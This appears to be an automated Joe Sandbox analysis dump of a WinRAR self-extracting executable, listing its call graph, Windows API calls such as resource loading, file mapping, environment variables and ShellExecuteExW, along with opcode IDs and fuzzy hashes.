cde664 DloadReleaseSectionWriteAccess 3 API calls 23515->23517 23516->23498 23518 cde812 23517->23518 23519 cde82a 23518->23519 23521 cde78d DloadProtectSection 3 API calls 23518->23521 23533 cde831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23519->23533 23521->23519 23531 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23522->23531 23524 cde669 23524->23509 23528 cde7a2 DloadProtectSection 23525->23528 23526 cde7a8 23526->23510 23527 cde7dd VirtualProtect 23527->23526 23528->23526 23528->23527 23532 cde6a3 VirtualQuery GetSystemInfo 23528->23532 23530->23513 23531->23524 23532->23527 23533->23516 25431 cda440 GdipCloneImage GdipAlloc 25432 ce3a40 5 API calls CatchGuardHandler 25484 cf1f40 CloseHandle 23671 cdcd58 23672 cdce22 23671->23672 23677 cdcd7b 23671->23677 23687 cdc793 _wcslen _wcsrchr 23672->23687 23699 cdd78f 23672->23699 23675 cdd40a 23677->23672 23678 cd1fbb CompareStringW 23677->23678 23678->23677 23679 cdca67 SetWindowTextW 23679->23687 23684 cdc855 SetFileAttributesW 23686 cdc90f GetFileAttributesW 23684->23686 23697 cdc86f __cftof _wcslen 23684->23697 23686->23687 23689 cdc921 DeleteFileW 23686->23689 23687->23675 23687->23679 23687->23684 23690 cdcc31 GetDlgItem SetWindowTextW SendMessageW 23687->23690 23694 cdcc71 SendMessageW 23687->23694 23698 cd1fbb CompareStringW 23687->23698 23723 cdb314 23687->23723 23727 cda64d GetCurrentDirectoryW 23687->23727 23729 cca5d1 6 API calls 23687->23729 23730 cca55a FindClose 23687->23730 23731 cdb48e 76 API calls 2 library calls 23687->23731 23732 ce3e3e 23687->23732 23689->23687 23691 cdc932 23689->23691 23690->23687 23692 cc4092 _swprintf 51 API calls 23691->23692 23693 cdc952 GetFileAttributesW 23692->23693 23693->23691 23695 cdc967 MoveFileW 23693->23695 23694->23687 23695->23687 23696 cdc97f MoveFileExW 23695->23696 23696->23687 23697->23686 23697->23687 23728 ccb991 51 API calls 2 library calls 23697->23728 23698->23687 23701 cdd799 __cftof _wcslen 23699->23701 23700 cdd9e7 23700->23687 23701->23700 23702 cdd9c0 23701->23702 23703 cdd8a5 23701->23703 23748 cd1fbb CompareStringW 23701->23748 23702->23700 23706 cdd9de ShowWindow 23702->23706 23745 cca231 23703->23745 23706->23700 23708 cdd8d9 ShellExecuteExW 23708->23700 23715 cdd8ec 23708->23715 23710 cdd8d1 23710->23708 23711 cdd925 23750 cddc3b 6 API calls 23711->23750 23712 cdd97b CloseHandle 23713 cdd989 23712->23713 23714 cdd994 23712->23714 23751 cd1fbb CompareStringW 23713->23751 23714->23702 23715->23711 23715->23712 23717 cdd91b ShowWindow 23715->23717 23717->23711 23719 cdd93d 23719->23712 23720 cdd950 GetExitCodeProcess 23719->23720 23720->23712 23721 cdd963 23720->23721 23721->23712 23724 cdb31e 23723->23724 23725 cdb3f0 ExpandEnvironmentStringsW 23724->23725 23726 cdb40d 23724->23726 23725->23726 23726->23687 23727->23687 23728->23697 23729->23687 23730->23687 23731->23687 23733 ce8e54 23732->23733 23734 ce8e6c 23733->23734 23735 ce8e61 23733->23735 23737 ce8e74 23734->23737 23743 ce8e7d _unexpected 23734->23743 23766 ce8e06 23735->23766 23738 ce8dcc _free 20 API calls 23737->23738 23741 ce8e69 23738->23741 23739 ce8ea7 HeapReAlloc 23739->23741 23739->23743 23740 ce8e82 23773 ce91a8 20 API calls __dosmaperr 23740->23773 23741->23687 23743->23739 23743->23740 23774 ce7a5e 7 API calls 2 library calls 23743->23774 23752 cca243 23745->23752 23748->23703 23749 ccb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23749->23710 23750->23719 23751->23714 23760 cdec50 23752->23760 23755 cca23a 23755->23708 23755->23749 23756 cca261 23762 ccbb03 23756->23762 23758 cca275 23758->23755 23759 cca279 GetFileAttributesW 23758->23759 23759->23755 23761 cca250 GetFileAttributesW 23760->23761 23761->23755 23761->23756 23763 ccbb10 _wcslen 23762->23763 23764 ccbbb8 GetCurrentDirectoryW 23763->23764 23765 ccbb39 _wcslen 23763->23765 23764->23765 23765->23758 23767 ce8e44 23766->23767 23771 ce8e14 _unexpected 23766->23771 23776 ce91a8 20 API calls __dosmaperr 23767->23776 23769 ce8e2f RtlAllocateHeap 23770 ce8e42 23769->23770 23769->23771 23770->23741 23771->23767 23771->23769 23775 ce7a5e 7 API calls 2 library calls 23771->23775 23773->23741 23774->23743 23775->23771 23776->23770 25434 cde455 14 API calls ___delayLoadHelper2@8 23812 cec051 31 API calls CatchGuardHandler 25486 ce7f6e 52 API calls 3 library calls 25435 ce8268 55 API calls _free 25436 cdc793 107 API calls 4 library calls 24696 cc9f7a 24697 cc9f8f 24696->24697 24698 cc9f88 24696->24698 24699 cc9f9c GetStdHandle 24697->24699 24706 cc9fab 24697->24706 24699->24706 24700 cca003 WriteFile 24700->24706 24701 cc9fcf 24702 cc9fd4 WriteFile 24701->24702 24701->24706 24702->24701 24702->24706 24704 cca095 24708 cc6e98 77 API calls 24704->24708 24706->24698 24706->24700 24706->24701 24706->24702 24706->24704 24707 cc6baa 78 API calls 24706->24707 24707->24706 24708->24698 24709 cc9a74 24712 cc9a7e 24709->24712 24710 cc9b9d SetFilePointer 24711 cc9bb6 GetLastError 24710->24711 24715 cc9ab1 24710->24715 24711->24715 24712->24710 24713 cc981a 79 API calls 24712->24713 24714 cc9b79 24712->24714 24712->24715 24713->24714 24714->24710 25438 cc1075 84 API calls 25439 cda070 10 API calls 25441 cdb270 99 API calls 25489 cc1f72 128 API calls __EH_prolog 25442 cda400 GdipDisposeImage GdipFree 25443 cdd600 70 API calls 25444 ce6000 QueryPerformanceFrequency QueryPerformanceCounter 25446 cef200 51 API calls 25491 ce2900 6 API calls 4 library calls 25493 cea700 21 API calls 25496 cc1710 86 API calls 25497 cdad10 73 API calls 25449 cc1025 29 API calls 25450 cdc220 93 API calls _swprintf 25452 cef421 21 API calls __vswprintf_c_l 25500 cdf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25501 cdff30 LocalFree 24789 cebb30 24790 cebb42 24789->24790 24791 cebb39 24789->24791 24793 ceba27 24791->24793 24794 ce97e5 _unexpected 38 API calls 24793->24794 24795 ceba34 24794->24795 24813 cebb4e 24795->24813 24797 ceba3c 24822 ceb7bb 24797->24822 24800 ceba53 24800->24790 24801 ce8e06 __vswprintf_c_l 21 API calls 24802 ceba64 24801->24802 24803 ceba96 24802->24803 24829 cebbf0 24802->24829 24806 ce8dcc _free 20 API calls 24803->24806 24806->24800 24807 ceba91 24839 ce91a8 20 API calls __dosmaperr 24807->24839 24809 cebada 24809->24803 24840 ceb691 26 API calls 24809->24840 24810 cebaae 24810->24809 24811 ce8dcc _free 20 API calls 24810->24811 24811->24809 24814 cebb5a __FrameHandler3::FrameUnwindToState 24813->24814 24815 ce97e5 _unexpected 38 API calls 24814->24815 24820 cebb64 24815->24820 24817 cebbe8 _abort 24817->24797 24820->24817 24821 ce8dcc _free 20 API calls 24820->24821 24841 ce8d24 38 API calls _abort 24820->24841 24842 ceac31 EnterCriticalSection 24820->24842 24843 cebbdf LeaveCriticalSection _abort 24820->24843 24821->24820 24823 ce4636 __cftof 38 API calls 24822->24823 24824 ceb7cd 24823->24824 24825 ceb7ee 24824->24825 24826 ceb7dc GetOEMCP 24824->24826 24827 ceb7f3 GetACP 24825->24827 24828 ceb805 24825->24828 24826->24828 24827->24828 24828->24800 24828->24801 24830 ceb7bb 40 API calls 24829->24830 24831 cebc0f 24830->24831 24832 cebc85 __cftof 24831->24832 24833 cebc16 24831->24833 24836 cebc60 IsValidCodePage 24831->24836 24844 ceb893 GetCPInfo 24832->24844 24834 cdfbbc CatchGuardHandler 5 API calls 24833->24834 24835 ceba89 24834->24835 24835->24807 24835->24810 24836->24833 24837 cebc72 GetCPInfo 24836->24837 24837->24832 24837->24833 24839->24803 24840->24803 24842->24820 24843->24820 24849 ceb8cd 24844->24849 24853 ceb977 24844->24853 24846 cdfbbc CatchGuardHandler 5 API calls 24848 ceba23 24846->24848 24848->24833 24854 cec988 24849->24854 24852 ceab78 __vswprintf_c_l 43 API calls 24852->24853 24853->24846 24855 ce4636 __cftof 38 API calls 24854->24855 24856 cec9a8 MultiByteToWideChar 24855->24856 24858 ceca7e 24856->24858 24859 cec9e6 24856->24859 24860 cdfbbc CatchGuardHandler 5 API calls 24858->24860 24861 ce8e06 __vswprintf_c_l 21 API calls 24859->24861 24864 ceca07 __cftof __vsnwprintf_l 24859->24864 24862 ceb92e 24860->24862 24861->24864 24868 ceab78 24862->24868 24863 ceca78 24873 ceabc3 20 API calls _free 24863->24873 24864->24863 24866 ceca4c MultiByteToWideChar 24864->24866 24866->24863 24867 ceca68 GetStringTypeW 24866->24867 24867->24863 24869 ce4636 __cftof 38 API calls 24868->24869 24870 ceab8b 24869->24870 24874 cea95b 24870->24874 24873->24858 24875 cea976 __vswprintf_c_l 24874->24875 24876 cea99c MultiByteToWideChar 24875->24876 24877 cea9c6 24876->24877 24887 ceab50 24876->24887 24879 cea9e7 __vsnwprintf_l 24877->24879 24881 ce8e06 __vswprintf_c_l 21 API calls 24877->24881 24878 cdfbbc CatchGuardHandler 5 API calls 24880 ceab63 24878->24880 24882 ceaa30 MultiByteToWideChar 24879->24882 24897 ceaa9c 24879->24897 24880->24852 24881->24879 24883 ceaa49 24882->24883 24882->24897 24901 ceaf6c 24883->24901 24887->24878 24888 ceaaab 24892 ce8e06 __vswprintf_c_l 21 API calls 24888->24892 24895 ceaacc __vsnwprintf_l 24888->24895 24889 ceaa73 24890 ceaf6c __vswprintf_c_l 11 API calls 24889->24890 24889->24897 24890->24897 24891 ceab41 24909 ceabc3 20 API calls _free 24891->24909 24892->24895 24893 ceaf6c __vswprintf_c_l 11 API calls 24896 ceab20 24893->24896 24895->24891 24895->24893 24896->24891 24898 ceab2f WideCharToMultiByte 24896->24898 24910 ceabc3 20 API calls _free 24897->24910 24898->24891 24899 ceab6f 24898->24899 24911 ceabc3 20 API calls _free 24899->24911 24902 ceac98 _unexpected 5 API calls 24901->24902 24903 ceaf93 24902->24903 24906 ceaf9c 24903->24906 24912 ceaff4 10 API calls 3 library calls 24903->24912 24905 ceafdc LCMapStringW 24905->24906 24907 cdfbbc CatchGuardHandler 5 API calls 24906->24907 24908 ceaa60 24907->24908 24908->24888 24908->24889 24908->24897 24909->24897 24910->24887 24911->24897 24912->24905 25454 cec030 GetProcessHeap

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00CD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                                                                              • Part of subcall function 00CDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CDA655
                                                                                                              • Part of subcall function 00CDAC16: OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                                                                              • Part of subcall function 00CDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                                                                              • Part of subcall function 00CDAC16: SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                                                                            • GetCommandLineW.KERNEL32 ref: 00CDDF5C
                                                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CDDF83
                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CDDF94
                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00CDDFCE
                                                                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDDFD7
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00D1EC90,00000800), ref: 00CDDFF2
                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00D1EC90), ref: 00CDDFFE
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00CDE009
                                                                                                            • _swprintf.LIBCMT ref: 00CDE048
                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CDE05A
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00CDE061
                                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 00CDE078
                                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CDE0C9
                                                                                                            • Sleep.KERNEL32(?), ref: 00CDE0F7
                                                                                                            • DeleteObject.GDI32 ref: 00CDE130
                                                                                                            • DeleteObject.GDI32(?), ref: 00CDE140
                                                                                                            • CloseHandle.KERNEL32 ref: 00CDE183
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                            • API String ID: 3049964643-2656992072
                                                                                                            • Opcode ID: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                                                                            • Instruction ID: ad3e4e2afdb8e70426ef12c3275aaf09c854915aef461ab4cb38d36035651922
                                                                                                            • Opcode Fuzzy Hash: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                                                                            • Instruction Fuzzy Hash: E961D271A04345BBD320ABA4EC49F7F77A9AB45700F00442BFA4AD23A1DF749944D772

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 812 cda6c2-cda6df FindResourceW 813 cda7db 812->813 814 cda6e5-cda6f6 SizeofResource 812->814 816 cda7dd-cda7e1 813->816 814->813 815 cda6fc-cda70b LoadResource 814->815 815->813 817 cda711-cda71c LockResource 815->817 817->813 818 cda722-cda737 GlobalAlloc 817->818 819 cda73d-cda746 GlobalLock 818->819 820 cda7d3-cda7d9 818->820 821 cda7cc-cda7cd GlobalFree 819->821 822 cda74c-cda76a call ce0320 CreateStreamOnHGlobal 819->822 820->816 821->820 825 cda76c-cda78e call cda626 822->825 826 cda7c5-cda7c6 GlobalUnlock 822->826 825->826 831 cda790-cda798 825->831 826->821 832 cda79a-cda7ae GdipCreateHBITMAPFromBitmap 831->832 833 cda7b3-cda7c1 831->833 832->833 834 cda7b0 832->834 833->826 834->833
                                                                                                            APIs
                                                                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00CDA73E
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CDA762
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                                                                              • Part of subcall function 00CDA626: GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                            • String ID: PNG
                                                                                                            • API String ID: 211097158-364855578
                                                                                                            • Opcode ID: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                                                                            • Instruction ID: b1630b1cecd9fe471fb7be987c7451b9123abae896e4612ee5534265ed431519
                                                                                                            • Opcode Fuzzy Hash: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                                                                            • Instruction Fuzzy Hash: 5E319175600342BFD7109F21EC88E2F7BB9EF84761B15451AFA15C2321EB31DD44DAA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1038 cca69b-cca6bf call cdec50 1041 cca727-cca730 FindNextFileW 1038->1041 1042 cca6c1-cca6ce FindFirstFileW 1038->1042 1043 cca742-cca7ff call cd0602 call ccc310 call cd15da * 3 1041->1043 1044 cca732-cca740 GetLastError 1041->1044 1042->1043 1045 cca6d0-cca6e2 call ccbb03 1042->1045 1049 cca804-cca811 1043->1049 1046 cca719-cca722 1044->1046 1053 cca6fe-cca707 GetLastError 1045->1053 1054 cca6e4-cca6fc FindFirstFileW 1045->1054 1046->1049 1056 cca709-cca70c 1053->1056 1057 cca717 1053->1057 1054->1043 1054->1053 1056->1057 1059 cca70e-cca711 1056->1059 1057->1046 1059->1057 1061 cca713-cca715 1059->1061 1061->1046
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA728
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA734
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 42610566-0
                                                                                                            • Opcode ID: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                                                                            • Instruction ID: 0bd3d2119a5de08dabd0e148464633c5fee509b36daac70e3f78f8961415629b
                                                                                                            • Opcode Fuzzy Hash: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                                                                            • Instruction Fuzzy Hash: 8F418072500559ABCB25DF64CC88BE9B7B8FB48350F14419AE96DD3200D734AE90DF91
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E0F
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E16
                                                                                                            • ExitProcess.KERNEL32 ref: 00CE7E28
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                                                                            • Instruction ID: fd21ebdc42877ba7ef0112347b27df6dbfab407cbd84f431e280ab2befcbbcdd
                                                                                                            • Opcode Fuzzy Hash: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                                                                            • Instruction Fuzzy Hash: 03E09A31004294BFCB116F55DD0AB5A7F69AB50341B004555F8158B132CB35EE51DB91
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                                                                            • Instruction ID: 7c96fdd495a8cfb93c4b101d06abf84f789af1523dcd4e85a4bd20ff232e61cc
                                                                                                            • Opcode Fuzzy Hash: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                                                                            • Instruction Fuzzy Hash: 9482F870904245AEDF15DB64C895FFBBBB9AF05300F0841BEE8599B282DB705B8DDB60
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CDB7E5
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDB8D1
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB8EF
                                                                                                            • IsDialogMessageW.USER32(?,?), ref: 00CDB902
                                                                                                            • TranslateMessage.USER32(?), ref: 00CDB910
                                                                                                            • DispatchMessageW.USER32(?), ref: 00CDB91A
                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CDB93D
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CDB960
                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDB983
                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDB99E
                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDB9B1
                                                                                                              • Part of subcall function 00CDD453: _wcslen.LIBCMT ref: 00CDD47D
                                                                                                            • SetFocus.USER32(00000000), ref: 00CDB9B8
                                                                                                            • _swprintf.LIBCMT ref: 00CDBA24
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                              • Part of subcall function 00CDD4D4: GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                                                                              • Part of subcall function 00CDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CDBA68
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CDBA90
                                                                                                            • GetTickCount.KERNEL32 ref: 00CDBAAE
                                                                                                            • _swprintf.LIBCMT ref: 00CDBAC2
                                                                                                            • GetLastError.KERNEL32(?,00000011), ref: 00CDBAF4
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CDBB43
                                                                                                            • _swprintf.LIBCMT ref: 00CDBB7C
                                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CDBBD0
                                                                                                            • GetCommandLineW.KERNEL32 ref: 00CDBBEA
